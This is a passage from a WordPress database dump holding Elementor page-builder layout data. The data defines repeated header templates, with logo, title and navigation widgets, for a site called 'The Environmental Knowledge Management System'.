(2816,350,'_elementor_version','2.7.5'),(2817,350,'_elementor_template_type','wp-post'),(2821,351,'_wp_page_template','elementor_canvas'),(2822,351,'_elementor_edit_mode','builder'),(2823,351,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":13.863,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.776,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":44,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":28.357,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2824,351,'_elementor_version','2.7.5'),(2825,351,'_elementor_template_type','wp-post'),(2829,352,'_wp_page_template','elementor_canvas'),(2830,352,'_elementor_edit_mode','builder'),(2831,352,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":13.863,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.776,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":44,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":28.357,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2832,352,'_elementor_version','2.7.5'),(2833,352,'_elementor_template_type','wp-post'),(2837,353,'_wp_page_template','elementor_canvas'),(2838,353,'_elementor_edit_mode','builder'),(2839,353,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"50\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.263,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":51.864,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.869,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2840,353,'_elementor_version','2.7.5'),(2841,353,'_elementor_template_type','wp-post'),(2845,354,'_wp_page_template','elementor_canvas'),(2846,354,'_elementor_edit_mode','builder'),(2847,354,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"90\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.263,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":51.864,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.869,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2848,354,'_elementor_version','2.7.5'),(2849,354,'_elementor_template_type','wp-post'),(2853,355,'_wp_page_template','elementor_canvas'),(2854,355,'_elementor_edit_mode','builder'),(2855,355,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"90\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.263,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":51.864,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.869,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"90\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2856,355,'_elementor_version','2.7.5'),(2857,355,'_elementor_template_type','wp-post'),(2908,368,'_wp_page_template','elementor_canvas'),(2909,368,'_elementor_edit_mode','builder'),(2910,368,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"70\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":15.577,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":55.087,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":29.332,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\